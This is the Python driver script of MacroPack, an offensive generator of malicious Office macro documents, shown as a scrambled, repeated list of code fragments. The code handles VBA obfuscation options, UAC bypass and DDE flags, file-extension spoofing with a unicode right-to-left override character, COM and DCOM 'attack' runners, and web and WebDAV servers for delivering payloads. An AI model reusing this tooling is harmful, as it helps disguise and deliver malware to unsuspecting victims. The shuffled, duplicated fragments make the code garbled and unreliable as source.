if mpSession.ddeMode or", "except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMinLen < 4 or", "get file content from stdin if not os.isatty(0): # check", "sys.exit(0) elif opt==\"-q\" or opt==\"--quiet\": logLevel = \"WARN\" elif opt==\"-p\"", "name to spoof extension if unicodeRtlo option is enabled if", "listener.run() # Activate WebDav server if mpSession.Wlisten: Wlistener = WListenServer(mpSession)", "Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) logging.info(\" Done!\\n\") sys.exit(0) if __name__ ==", "os.isatty(0): # check if something is being piped logging.info(\" [-]", "only for Pro release if MP_TYPE == \"Pro\": longOptions.extend(arg_mgt_pro.proArgsLongOptions) shortOptions", "import logging import shutil import psutil from modules.com_run import ComGenerator", "applied)\") MP_TYPE=\"Community\" else: arg_mgt_pro.verify(mpSession) # Check output file format if", "import psutil from modules.com_run import ComGenerator from modules.web_server import ListenServer", "shutil.rmtree(working_directory) sys.exit(2) logging.info(\" [-] Store input file...\") shutil.copy2(mpSession.fileInput, inputFile) if", "def main(argv): global MP_TYPE logLevel = LOGLEVEL # initialize macro_pack", "True elif opt==\"--obfuscate-names\": mpSession.obfuscateNames = True elif opt==\"--obfuscate-names-charset\": try: mpSession.obfuscatedNamesCharset", "generator = DcomGenerator(mpSession) generator.run() # Activate Web server if mpSession.listen:", "opt == \"--run\": if sys.platform == \"win32\": mpSession.runTarget = os.path.abspath(arg)", "if not mpSession.isTrojanMode: # verify that output file does not", "os.path.abspath(arg) elif opt==\"-t\" or opt==\"--template\": mpSession.template = arg elif opt", "os import sys import getopt import logging import shutil import", "True elif opt == \"--dde\": if sys.platform == \"win32\": mpSession.ddeMode", "MP_TYPE == \"Pro\": arg_mgt_pro.processProArg(opt, arg, mpSession, BANNER) else: help.printUsage(BANNER, sys.argv[0])", "mpSession.obfuscateNames = True elif opt==\"--obfuscate-names-charset\": try: mpSession.obfuscatedNamesCharset = arg except", "there are not binary chars in input fil if utils.isBinaryString(open(mpSession.fileInput,", "filename does not end with flagged extension # Append file", "or mpSession.obfuscatedNamesMaxLen > 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-strings\": mpSession.obfuscateStrings", "# use Colorama to make Termcolor work on Windows too", "\"obfuscate-strings\", \"obfuscate-names-charset=\", \"obfuscate-names-minlen=\", \"obfuscate-names-maxlen=\", \"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\", \"start-function=\",\"uac-bypass\", \"unicode-rtlo=\", \"dde\", \"print\", \"force-yes\",", "import init from termcolor import colored # {PyArmor Protection Code}", "MP_TYPE=\"Community\" else: arg_mgt_pro.verify(mpSession) # Check output file format if mpSession.outputFilePath:", "spoof, such as \"jpg\" logging.info(\" [+] Inject %s false extension", "os.path.splitext(mpSession.outputFilePath) logging.info(\" [-] Extension %s \" % fileExtension) # Append", "os.path.isdir(working_directory): shutil.rmtree(working_directory) sys.exit(2) logging.info(\" [-] Store input file...\") shutil.copy2(mpSession.fileInput, inputFile)", "% mpSession.unicodeRtlo) # Separate document path and extension (fileName, fileExtension)", "mpSession.listen = True mpSession.listenRoot = os.path.abspath(arg) elif 
opt==\"--port\": mpSession.listenPort =", "check if running from explorer, if yes restart from cmd", "True mpSession.obfuscateStrings = True mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-form\": mpSession.obfuscateForm", "Check there are not binary chars in input fil if", "\"jpg\" logging.info(\" [+] Inject %s false extension with unicode RTLO\"", "file content from stdin if not os.isatty(0): # check if", "sys.exit(0) elif opt==\"--obfuscate-names-maxlen\": try: mpSession.obfuscatedNamesMaxLen = int(arg) except ValueError: help.printUsage(BANNER,", "output format: %s\" % mpSession.outputFileType) elif not mpSession.listen and not", "mpSession.ddeMode = True elif opt == \"--run\": if sys.platform ==", "else: sys.stdin = sys.__stdin__ else: if not os.path.isfile(mpSession.fileInput): logging.error(\" [!]", "server if mpSession.listen: listener = ListenServer(mpSession) listener.run() # Activate WebDav", "and (MP_TYPE != \"Pro\" or mpSession.dcomTarget is None): logging.error(\" [!]", "elif opt==\"-p\" or opt==\"--print\": mpSession.printFile = True elif opt ==", "True elif opt==\"--uac-bypass\": mpSession.uacBypass = True elif opt == \"--unicode-rtlo\":", "= ComGenerator(mpSession) generator.run() if MP_TYPE == \"Pro\": #run dcom attack", "# check if running from explorer, if yes restart from", "\"Pro\" or mpSession.dcomTarget is None): logging.error(\" [!] You need to", "Exception: logging.exception(\" [!] Exception caught!\") except KeyboardInterrupt: logging.error(\" [!] Keyboard", "too init() WORKING_DIR = \"temp\" BANNER = help.getToolPres() def main(argv):", "Append extension to spoof in reverse order fileName += '\\u200b'", "Store std input in file...\") f = open(inputFile, 'w') f.writelines(mpSession.stdinContent)", "else: if not os.path.isfile(mpSession.fileInput): logging.error(\" [!] ERROR: Could not find", "% mpSession.outputFilePath) # Retrieve the right payload builder if mpSession.outputFileType", "= psutil.Process(os.getpid()).parent().parent().name() # if running_from == 'explorer.exe': # os.system(\"cmd.exe /k", "something is being piped logging.info(\" [-] Waiting for piped input", "without triggering EOF #sys.stdin.close() if sys.platform == \"win32\": sys.stdin =", "RTLO\" % mpSession.unicodeRtlo) # Separate document path and extension (fileName,", "== \"win32\": longOptions.extend([\"run=\", \"run-visible\"]) opts, args = getopt.getopt(argv, shortOptions, longOptions)", "!= \"Pro\" or mpSession.dcomTarget is None): logging.error(\" [!] You need", "utils.randomAlpha(9)) + \".vba\" if mpSession.stdinContent is not None: import time", "\"quiet\", \"input-file=\", \"encode\", \"obfuscate\", \"obfuscate-form\", \"obfuscate-names\", \"obfuscate-declares\", \"obfuscate-strings\", \"obfuscate-names-charset=\", \"obfuscate-names-minlen=\",", "help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMaxLen < 4 or mpSession.obfuscatedNamesMaxLen >", "sys.exit(2) else: logging.info(\" [-] Input file path: %s\" % mpSession.fileInput)", "[!] ERROR: Invalid format for %s. 
Input should be text", "LOGLEVEL # initialize macro_pack session object working_directory = os.path.join(os.getcwd(), WORKING_DIR)", "os.path.join(working_directory, \"command.cmd\") else: inputFile = os.path.join(working_directory, utils.randomAlpha(9)) + \".vba\" if", "longOptions = [\"embed=\", \"listen=\", \"port=\", \"webdav-listen=\", \"generate=\", \"quiet\", \"input-file=\", \"encode\",", "#!/usr/bin/python3 # encoding: utf-8 import os import sys import getopt", "= int(arg) elif opt==\"--icon\": mpSession.icon = arg elif opt==\"-w\" or", "try: # Create temporary work file. if mpSession.ddeMode or mpSession.template", "ContainerGenerator(mpSession) generator.run() #run com attack if mpSession.runTarget: generator = ComGenerator(mpSession)", "text format containing your VBA script.\" % mpSession.fileInput) logging.info(\" [+]", "= \"temp\" BANNER = help.getToolPres() def main(argv): global MP_TYPE logLevel", "attack if mpSession.runTarget: generator = ComGenerator(mpSession) generator.run() if MP_TYPE ==", "# check if something is being piped logging.info(\" [-] Waiting", "os.path.join(os.getcwd(), WORKING_DIR) if MP_TYPE == \"Pro\": mpSession = mp_session_pro.MpSessionPro(working_directory, VERSION,", "opt==\"--help\": help.printUsage(BANNER, sys.argv[0]) sys.exit(0) else: if MP_TYPE == \"Pro\": arg_mgt_pro.processProArg(opt,", "not mpSession.Wlisten and mpSession.runTarget is None and (MP_TYPE != \"Pro\"", "unicode RTLO\" % mpSession.unicodeRtlo) # Separate document path and extension", "help using %s -h)\" % os.path.basename(utils.getRunningApp())) sys.exit(2) if not mpSession.isTrojanMode:", "opt==\"--obfuscate-names-minlen\": try: mpSession.obfuscatedNamesMinLen = int(arg) except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0)", "\"unicode-rtlo=\", \"dde\", \"print\", \"force-yes\", \"help\"] shortOptions= \"e:l:w:s:f:t:G:hqmop\" # only for", "mpSession.htaMacro): inputFile = os.path.join(working_directory, \"command.cmd\") else: inputFile = os.path.join(working_directory, utils.randomAlpha(9))", "not mpSession.isTrojanMode: # verify that output file does not already", "help.printAvailableFormats(BANNER) sys.exit(0) elif opt==\"-h\" or opt==\"--help\": help.printUsage(BANNER, sys.argv[0]) sys.exit(0) else:", "Input file path: %s\" % mpSession.fileInput) if MP_TYPE == \"Pro\":", "Wlistener.run() except Exception: logging.exception(\" [!] Exception caught!\") except KeyboardInterrupt: logging.error(\"", "mpSession.runTarget = os.path.abspath(arg) elif opt == \"--run-visible\": if sys.platform ==", "try: mpSession.obfuscatedNamesMaxLen = int(arg) except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if", "%s -h)\" % os.path.basename(utils.getRunningApp())) sys.exit(2) if not mpSession.isTrojanMode: # verify", "or opt==\"--template\": mpSession.template = arg elif opt == \"--listtemplates\": help.printTemplatesUsage(BANNER,", "int(arg) mpSession.WlistenPort = int(arg) elif opt==\"--icon\": mpSession.icon = arg elif", "if mpSession.outputFilePath: if not os.path.isdir(os.path.dirname(mpSession.outputFilePath)): logging.error(\" [!] 
Could not find", "= os.path.join(os.getcwd(), WORKING_DIR) if MP_TYPE == \"Pro\": mpSession = mp_session_pro.MpSessionPro(working_directory,", "= open(inputFile, 'w') f.writelines(mpSession.stdinContent) f.close() else: # Create temporary work", "not binary chars in input fil if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)): logging.error(\"", "opt==\"--icon\": mpSession.icon = arg elif opt==\"-w\" or opt==\"--webdav-listen\": mpSession.Wlisten =", "elif opt==\"-l\" or opt==\"--listen\": mpSession.listen = True mpSession.listenRoot = os.path.abspath(arg)", "logging.info(\" [-] Store input file...\") shutil.copy2(mpSession.fileInput, inputFile) if os.path.isfile(inputFile): logging.info(\"", "if unicodeRtlo option is enabled if mpSession.unicodeRtlo: # Reminder; mpSession.unicodeRtlo", "not end with flagged extension # Append file extension fileName", "sys.exit(0) if logLevel == \"INFO\": os.system('cls' if os.name == 'nt'", "if not os.path.exists(working_directory): os.makedirs(working_directory) try: # Create temporary work file.", "Plugins} # use Colorama to make Termcolor work on Windows", "DcomGenerator(mpSession) generator.run() # Activate Web server if mpSession.listen: listener =", "sys.__stdin__ else: if not os.path.isfile(mpSession.fileInput): logging.error(\" [!] ERROR: Could not", "Needed to avoid some weird race condition logging.info(\" [-] Store", "Inject %s false extension with unicode RTLO\" % mpSession.unicodeRtlo) #", "import MSTypes from common.definitions import VERSION, LOGLEVEL if sys.platform ==", "> 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-maxlen\": try: mpSession.obfuscatedNamesMaxLen =", "\"--unicode-rtlo\": mpSession.unicodeRtlo = arg elif opt in (\"-G\", \"--generate\"): mpSession.outputFilePath", "file does not already exist if os.path.isfile(mpSession.outputFilePath): logging.error(\" [!] ERROR:", "mpSession.outputFileType) elif not mpSession.listen and not mpSession.Wlisten and mpSession.runTarget is", "sys.platform == \"win32\": sys.stdin = open(\"conIN$\") else: sys.stdin = sys.__stdin__", "else: logging.info(\" [-] Target output format: %s\" % mpSession.outputFileType) elif", "inputFile = os.path.join(working_directory, \"command.cmd\") else: inputFile = os.path.join(working_directory, utils.randomAlpha(9)) +", "pipe, so we can call input() later without triggering EOF", "Input should be text format containing your VBA script.\" %", "import win32com.client #@UnresolvedImport @UnusedImport except: print(\"Error: Could not find win32com.\")", "True mpSession.obfuscateNames = True mpSession.obfuscateStrings = True mpSession.obfuscateDeclares = True", "mpSession.listen: listener = ListenServer(mpSession) listener.run() # Activate WebDav server if", "elif opt==\"--port\": mpSession.listenPort = int(arg) mpSession.WlistenPort = int(arg) elif opt==\"--icon\":", "if not os.path.isfile(mpSession.fileInput): logging.error(\" [!] 
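
# Typical invocations, inferred from the options parsed in main() below
# (file and template names are illustrative; see -h, --listformats and
# --listtemplates for the authoritative lists):
#   echo "calc.exe" | macro_pack.py -t CMD -o -G invoice.docm
#       pipe a command into a template, obfuscate, generate a Word document
#   macro_pack.py -f payload.vba -o -G report.xls
#       build an obfuscated macro from a local VBA source file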
def main(argv):
    global MP_TYPE
    logLevel = LOGLEVEL
    # initialize macro_pack session object
    working_directory = os.path.join(os.getcwd(), WORKING_DIR)
    if MP_TYPE == "Pro":
        mpSession = mp_session_pro.MpSessionPro(working_directory, VERSION, MP_TYPE)
    else:
        mpSession = mp_session.MpSession(working_directory, VERSION, MP_TYPE)

    try:
        longOptions = ["embed=", "listen=", "port=", "webdav-listen=", "generate=", "quiet", "input-file=",
                       "encode", "obfuscate", "obfuscate-form", "obfuscate-names", "obfuscate-declares",
                       "obfuscate-strings", "obfuscate-names-charset=", "obfuscate-names-minlen=",
                       "obfuscate-names-maxlen=", "file=", "template=", "listtemplates", "listformats",
                       "icon=", "start-function=", "uac-bypass", "unicode-rtlo=", "dde", "print",
                       "force-yes", "help"]
        shortOptions = "e:l:w:s:f:t:G:hqmop"
        # only for Pro release
        if MP_TYPE == "Pro":
            longOptions.extend(arg_mgt_pro.proArgsLongOptions)
            shortOptions += arg_mgt_pro.proArgsShortOptions
        # Only enabled on windows
        if sys.platform == "win32":
            longOptions.extend(["run=", "run-visible"])
        opts, args = getopt.getopt(argv, shortOptions, longOptions)  # @UnusedVariable
    except getopt.GetoptError:
        help.printUsage(BANNER, sys.argv[0])
        sys.exit(2)

    for opt, arg in opts:
        if opt in ("-o", "--obfuscate"):
            mpSession.obfuscateForm = True
            mpSession.obfuscateNames = True
            mpSession.obfuscateStrings = True
            mpSession.obfuscateDeclares = True
        elif opt == "--obfuscate-form":
            mpSession.obfuscateForm = True
        elif opt == "--obfuscate-declares":
            mpSession.obfuscateDeclares = True
        elif opt == "--obfuscate-names":
            mpSession.obfuscateNames = True
        elif opt == "--obfuscate-names-charset":
            try:
                mpSession.obfuscatedNamesCharset = arg
            except ValueError:
                help.printUsage(BANNER, sys.argv[0])
                sys.exit(0)
        elif opt == "--obfuscate-names-minlen":
            try:
                mpSession.obfuscatedNamesMinLen = int(arg)
            except ValueError:
                help.printUsage(BANNER, sys.argv[0])
                sys.exit(0)
            if mpSession.obfuscatedNamesMinLen < 4 or mpSession.obfuscatedNamesMinLen > 255:
                help.printUsage(BANNER, sys.argv[0])
                sys.exit(0)
        elif opt == "--obfuscate-names-maxlen":
            try:
                mpSession.obfuscatedNamesMaxLen = int(arg)
            except ValueError:
                help.printUsage(BANNER, sys.argv[0])
                sys.exit(0)
            if mpSession.obfuscatedNamesMaxLen < 4 or mpSession.obfuscatedNamesMaxLen > 255:
                help.printUsage(BANNER, sys.argv[0])
                sys.exit(0)
        elif opt == "--obfuscate-strings":
            mpSession.obfuscateStrings = True
        elif opt == "-s" or opt == "--start-function":
            mpSession.startFunction = arg
        elif opt == "-l" or opt == "--listen":
            mpSession.listen = True
            mpSession.listenRoot = os.path.abspath(arg)
        elif opt == "--port":
            mpSession.listenPort = int(arg)
            mpSession.WlistenPort = int(arg)
        elif opt == "--icon":
            mpSession.icon = arg
        elif opt == "-w" or opt == "--webdav-listen":
            mpSession.Wlisten = True
            mpSession.WRoot = os.path.abspath(arg)
        elif opt == "-f" or opt == "--input-file":
            mpSession.fileInput = arg
        elif opt == "-e" or opt == "--embed":
            mpSession.embeddedFilePath = os.path.abspath(arg)
        elif opt == "-t" or opt == "--template":
            mpSession.template = arg
        elif opt == "--listtemplates":
            help.printTemplatesUsage(BANNER, sys.argv[0])
            sys.exit(0)
        elif opt == "-q" or opt == "--quiet":
            logLevel = "WARN"
        elif opt == "-p" or opt == "--print":
            mpSession.printFile = True
        elif opt == "--dde":
            if sys.platform == "win32":
                mpSession.ddeMode = True
        elif opt == "--run":
            if sys.platform == "win32":
                mpSession.runTarget = os.path.abspath(arg)
        elif opt == "--run-visible":
            if sys.platform == "win32":
                mpSession.runVisible = True
        elif opt == "--force-yes":
            mpSession.forceYes = True
        elif opt == "--uac-bypass":
            mpSession.uacBypass = True
        elif opt == "--unicode-rtlo":
            mpSession.unicodeRtlo = arg
        elif opt in ("-G", "--generate"):
            mpSession.outputFilePath = os.path.abspath(arg)
        elif opt == "--listformats":
            help.printAvailableFormats(BANNER)
            sys.exit(0)
        elif opt == "-h" or opt == "--help":
            help.printUsage(BANNER, sys.argv[0])
            sys.exit(0)
        else:
            if MP_TYPE == "Pro":
                arg_mgt_pro.processProArg(opt, arg, mpSession, BANNER)
            else:
                help.printUsage(BANNER, sys.argv[0])
                sys.exit(0)

    if logLevel == "INFO":
        os.system('cls' if os.name == 'nt' else 'clear')
    # Logging
    logging.basicConfig(level=getattr(logging, logLevel), format="%(message)s",
                        handlers=[utils.ColorLogFiler()])
    logging.info(colored(BANNER, 'green'))
    logging.info(" [+] Preparations...")
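
    # Note (inferred from the checks below): the payload source comes either from
    # -f/--input-file or from a shell pipe. os.isatty(0) is False when fd 0 is a
    # pipe or redirection, e.g. (illustrative):
    #   type payload.vba | macro_pack.py -o -G demo.doc
    # After the pipe is drained, stdin is reopened on the console ("conIN$" on
    # Windows) so that later interactive input() prompts do not hit EOF.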
    # check input args
    if mpSession.fileInput is None:
        # Argument not supplied, try to get file content from stdin
        if not os.isatty(0):  # check if something is being piped
            logging.info(" [-] Waiting for piped input feed...")
            mpSession.stdinContent = sys.stdin.readlines()
            # Close Stdin pipe, so we can call input() later without triggering EOF
            # sys.stdin.close()
            if sys.platform == "win32":
                sys.stdin = open("conIN$")
            else:
                sys.stdin = sys.__stdin__
    else:
        if not os.path.isfile(mpSession.fileInput):
            logging.error(" [!] ERROR: Could not find %s!" % mpSession.fileInput)
            sys.exit(2)
        else:
            logging.info(" [-] Input file path: %s" % mpSession.fileInput)

    if MP_TYPE == "Pro":
        if mpSession.communityMode:
            logging.warning(" [!] Running in community mode (pro features not applied)")
            MP_TYPE = "Community"
        else:
            arg_mgt_pro.verify(mpSession)

    # Check output file format
    if mpSession.outputFilePath:
        if not os.path.isdir(os.path.dirname(mpSession.outputFilePath)):
            logging.error(" [!] Could not find output folder %s." % os.path.dirname(mpSession.outputFilePath))
            sys.exit(2)
        if mpSession.outputFileType == MSTypes.UNKNOWN:
            logging.error(" [!] %s is not a supported extension. Use --listformats to view supported MacroPack formats." % os.path.splitext(mpSession.outputFilePath)[1])
            sys.exit(2)
        else:
            logging.info(" [-] Target output format: %s" % mpSession.outputFileType)
    elif not mpSession.listen and not mpSession.Wlisten and mpSession.runTarget is None and (MP_TYPE != "Pro" or mpSession.dcomTarget is None):
        logging.error(" [!] You need to provide an output file! (get help using %s -h)" % os.path.basename(utils.getRunningApp()))
        sys.exit(2)

    if not mpSession.isTrojanMode:
        # verify that the output file does not already exist
        # (defensive guard: outputFilePath may be unset in listen-only runs)
        if mpSession.outputFilePath and os.path.isfile(mpSession.outputFilePath):
            logging.error(" [!] ERROR: Output file %s already exists!" % mpSession.outputFilePath)
            sys.exit(2)
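
    # All intermediate artifacts (the temporary VBA/command file below, builder
    # scratch output, etc.) live under ./temp (WORKING_DIR); the folder is removed
    # again in the cleanup at the end of main(), including after exceptions.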
    # Create temporary folder
    logging.info(" [-] Temporary working dir: %s" % working_directory)
    if not os.path.exists(working_directory):
        os.makedirs(working_directory)

    try:
        # Create temporary work file.
        if mpSession.ddeMode or mpSession.template or (mpSession.outputFileType not in MSTypes.VB_FORMATS + [MSTypes.VBA] and not mpSession.htaMacro):
            inputFile = os.path.join(working_directory, "command.cmd")
        else:
            inputFile = os.path.join(working_directory, utils.randomAlpha(9)) + ".vba"
        if mpSession.stdinContent is not None:
            import time
            time.sleep(0.4)  # Needed to avoid some weird race condition
            logging.info(" [-] Store std input in file...")
            f = open(inputFile, 'w')
            f.writelines(mpSession.stdinContent)
            f.close()
        else:
            # Create temporary work file
            if mpSession.fileInput is not None:
                # Check there are no binary chars in the input file
                if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)):
                    logging.error(" [!] ERROR: Invalid format for %s. Input should be text format containing your VBA script." % mpSession.fileInput)
                    logging.info(" [+] Cleaning...")
                    if os.path.isdir(working_directory):
                        shutil.rmtree(working_directory)
                    sys.exit(2)
                logging.info(" [-] Store input file...")
                shutil.copy2(mpSession.fileInput, inputFile)

        if os.path.isfile(inputFile):
            logging.info(" [-] Temporary input file: %s" % inputFile)

        # Edit output file name to spoof extension if the unicodeRtlo option is enabled
        if mpSession.unicodeRtlo:
            # Reminder: mpSession.unicodeRtlo contains the extension we want to spoof, such as "jpg"
            logging.info(" [+] Inject %s false extension with unicode RTLO" % mpSession.unicodeRtlo)
            # Separate document path and extension
            (fileName, fileExtension) = os.path.splitext(mpSession.outputFilePath)
            logging.info(" [-] Extension %s " % fileExtension)
            # Append unicode RTLO to file name
            fileName += '\u202e'
            # Append extension to spoof in reverse order
            fileName += '\u200b' + mpSession.unicodeRtlo[::-1]  # Prepend invisible space so filename does not end with flagged extension
            # Append file extension
            fileName += fileExtension
            mpSession.outputFilePath = fileName
            logging.info(" [-] File name modified to: %s" % mpSession.outputFilePath)
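
        # Worked example (illustrative): with --unicode-rtlo=jpg and -G invoice.docm,
        # the stored name becomes "invoice" + U+202E + U+200B + "gpj" + ".docm".
        # Because U+202E renders the characters after it right-to-left, most file
        # managers display something close to "invoicemcod.jpg".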
        # Retrieve the right payload builder
        if mpSession.outputFileType != MSTypes.UNKNOWN:
            if MP_TYPE == "Pro" and not mpSession.communityMode:
                payloadBuilder = PayloadBuilderFactoryPro().getPayloadBuilder(mpSession)
            else:
                payloadBuilder = PayloadBuilderFactory().getPayloadBuilder(mpSession)
            # Build payload
            if payloadBuilder is not None:
                payloadBuilder.run()
                if MP_TYPE == "Pro":
                    generator = ContainerGenerator(mpSession)
                    generator.run()
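
        # The remaining steps are optional delivery/execution helpers driven by the
        # flags parsed above: --run hands the target to the COM generator on the
        # local Windows host, the Pro DCOM generator does the equivalent against a
        # remote target, and -l/--listen and -w/--webdav-listen serve the given
        # root folder over HTTP and WebDAV respectively.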
        # run com attack
        if mpSession.runTarget:
            generator = ComGenerator(mpSession)
            generator.run()
        if MP_TYPE == "Pro":
            # run dcom attack
            if mpSession.dcom:
                generator = DcomGenerator(mpSession)
                generator.run()
        # Activate Web server
        if mpSession.listen:
            listener = ListenServer(mpSession)
            listener.run()
        # Activate WebDav server
        if mpSession.Wlisten:
            Wlistener = WListenServer(mpSession)
            Wlistener.run()
    except Exception:
        logging.exception(" [!] Exception caught!")
    except KeyboardInterrupt:
        logging.error(" [!] Keyboard interrupt caught!")
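
    # The cleanup below runs on success and after either handler above. Note that
    # KeyboardInterrupt is not an Exception subclass in Python 3, so Ctrl-C is
    # caught by its own handler and still reaches the cleanup.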
    logging.info(" [+] Cleaning...")
    if os.path.isdir(working_directory):
        shutil.rmtree(working_directory)
    logging.info(" Done!\n")
    sys.exit(0)


if __name__ == '__main__':
    # check if running from explorer, if yes restart from cmd line
    # running_from = psutil.Process(os.getpid()).parent().parent().name()
    # if running_from == 'explorer.exe':
    #     os.system("cmd.exe /k \"%s\"" % utils.getRunningApp())
    # PyArmor Plugin: checkPlug()
    main(sys.argv[1:])
Running in community", "# Edit outputfile name to spoof extension if unicodeRtlo option", "from common import utils, mp_session, help from common.utils import MSTypes", "sys.exit(1) MP_TYPE=\"Pro\" if utils.checkModuleExist(\"pro_core\"): from pro_modules.utilities.dcom_run import DcomGenerator from pro_modules.payload_builders.containers", "(\"-o\", \"--obfuscate\"): mpSession.obfuscateForm = True mpSession.obfuscateNames = True mpSession.obfuscateStrings =", "MacroPack formats.\" % os.path.splitext(mpSession.outputFilePath)[1]) sys.exit(2) else: logging.info(\" [-] Target output", "if os.name == 'nt' else 'clear') # Logging logging.basicConfig(level=getattr(logging, logLevel),format=\"%(message)s\",", "is None and (MP_TYPE != \"Pro\" or mpSession.dcomTarget is None):", "fil if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)): logging.error(\" [!] ERROR: Invalid format for", "object working_directory = os.path.join(os.getcwd(), WORKING_DIR) if MP_TYPE == \"Pro\": mpSession", "file...\") shutil.copy2(mpSession.fileInput, inputFile) if os.path.isfile(inputFile): logging.info(\" [-] Temporary input file:", "elif opt == \"--unicode-rtlo\": mpSession.unicodeRtlo = arg elif opt in", "Separate document path and extension (fileName, fileExtension) = os.path.splitext(mpSession.outputFilePath) logging.info(\"", "logging.info(\" [-] Temporary working dir: %s\" % working_directory) if not", "\" % fileExtension) # Append unicode RTLO to file name", "import PayloadBuilderFactoryPro from pro_core import arg_mgt_pro, mp_session_pro else: MP_TYPE=\"Community\" from", "to make Termcolor work on Windows too init() WORKING_DIR =", "else: mpSession = mp_session.MpSession(working_directory, VERSION, MP_TYPE) try: longOptions = [\"embed=\",", "from common.definitions import VERSION, LOGLEVEL if sys.platform == \"win32\": try:", "BANNER) else: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if logLevel == \"INFO\": os.system('cls'", "elif opt==\"--icon\": mpSession.icon = arg elif opt==\"-w\" or opt==\"--webdav-listen\": mpSession.Wlisten", "True mpSession.WRoot = os.path.abspath(arg) elif opt == \"-f\" or opt==", "= arg elif opt in (\"-G\", \"--generate\"): mpSession.outputFilePath = os.path.abspath(arg)", "that output file does not already exist if os.path.isfile(mpSession.outputFilePath): logging.error(\"", "to file name fileName += '\\u202e' # Append extension to", "if mpSession.dcom: generator = DcomGenerator(mpSession) generator.run() # Activate Web server", "arg except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-minlen\": try: mpSession.obfuscatedNamesMinLen", "caught!\") except KeyboardInterrupt: logging.error(\" [!] 
Keyboard interrupt caught!\") logging.info(\" [+]", "import WListenServer from modules.payload_builder_factory import PayloadBuilderFactory from common import utils,", "and extension (fileName, fileExtension) = os.path.splitext(mpSession.outputFilePath) logging.info(\" [-] Extension %s", "from modules.web_server import ListenServer from modules.Wlisten_server import WListenServer from modules.payload_builder_factory", "sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-maxlen\": try: mpSession.obfuscatedNamesMaxLen = int(arg) except ValueError:", "mpSession.obfuscatedNamesMaxLen > 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-strings\": mpSession.obfuscateStrings =", "getopt import logging import shutil import psutil from modules.com_run import", "opt==\"-w\" or opt==\"--webdav-listen\": mpSession.Wlisten = True mpSession.WRoot = os.path.abspath(arg) elif", "std input in file...\") f = open(inputFile, 'w') f.writelines(mpSession.stdinContent) f.close()", "mpSession.communityMode: logging.warning(\" [!] Running in community mode (pro features not", "%s is not a supported extension. Use --listformats to view", "mpSession.unicodeRtlo[::-1] # Prepend invisible space so filename does not end", "# Needed to avoid some weird race condition logging.info(\" [-]", "== \"win32\": mpSession.runVisible = True elif opt == \"--force-yes\": mpSession.forceYes", "input fil if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)): logging.error(\" [!] ERROR: Invalid format", "mpSession.unicodeRtlo) # Separate document path and extension (fileName, fileExtension) =", "file...\") f = open(inputFile, 'w') f.writelines(mpSession.stdinContent) f.close() else: # Create", "supported extension. Use --listformats to view supported MacroPack formats.\" %", "opt== \"--input-file\": mpSession.fileInput = arg elif opt == \"-e\" or", "input args if mpSession.fileInput is None: # Argument not supplied,", "in MSTypes.VB_FORMATS+[MSTypes.VBA] and not mpSession.htaMacro): inputFile = os.path.join(working_directory, \"command.cmd\") else:", "elif opt == \"--listformats\": help.printAvailableFormats(BANNER) sys.exit(0) elif opt==\"-h\" or opt==\"--help\":", "= WListenServer(mpSession) Wlistener.run() except Exception: logging.exception(\" [!] Exception caught!\") except", "True elif opt==\"--obfuscate-declares\": mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-names\": mpSession.obfuscateNames =", "help.getToolPres() def main(argv): global MP_TYPE logLevel = LOGLEVEL # initialize", "if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)): logging.error(\" [!] 
ERROR: Invalid format for %s.", "Extension %s \" % fileExtension) # Append unicode RTLO to", "'green')) logging.info(\" [+] Preparations...\") # check input args if mpSession.fileInput", "binary chars in input fil if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)): logging.error(\" [!]", "\"WARN\" elif opt==\"-p\" or opt==\"--print\": mpSession.printFile = True elif opt", "= True mpSession.obfuscateNames = True mpSession.obfuscateStrings = True mpSession.obfuscateDeclares =", "mpSession.obfuscateForm = True elif opt==\"--obfuscate-declares\": mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-names\":", "if MP_TYPE == \"Pro\": generator = ContainerGenerator(mpSession) generator.run() #run com", "\"win32\": mpSession.runTarget = os.path.abspath(arg) elif opt == \"--run-visible\": if sys.platform", "opt==\"--obfuscate-strings\": mpSession.obfuscateStrings = True elif opt==\"-s\" or opt==\"--start-function\": mpSession.startFunction =", "mpSession.fileInput = arg elif opt == \"-e\" or opt== \"--embed\":", "help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if logLevel == \"INFO\": os.system('cls' if os.name", "input in file...\") f = open(inputFile, 'w') f.writelines(mpSession.stdinContent) f.close() else:", "extension if unicodeRtlo option is enabled if mpSession.unicodeRtlo: # Reminder;" ]
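# A minimal sketch (not from the MacroPack source) of the unicode RTLO trick used
# in main() above. All values here are hypothetical examples: a spoofed "jpg"
# extension on a real ".doc" output. U+202E (RIGHT-TO-LEFT OVERRIDE) makes
# RTL-aware file listings render every character after it reversed, which
# visually hides the real extension.
def demo_rtlo(file_name="report", spoof_ext="jpg", real_ext=".doc"):
    spoofed = file_name + '\u202e' + spoof_ext[::-1] + real_ext
    # The name still truly ends with the real extension...
    assert spoofed.endswith(real_ext)
    # ...but it is displayed roughly as file_name + real_ext[::-1] + spoof_ext,
    # i.e. "report" followed by "cod.jpg" instead of "gpj.doc".
    return spoofed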
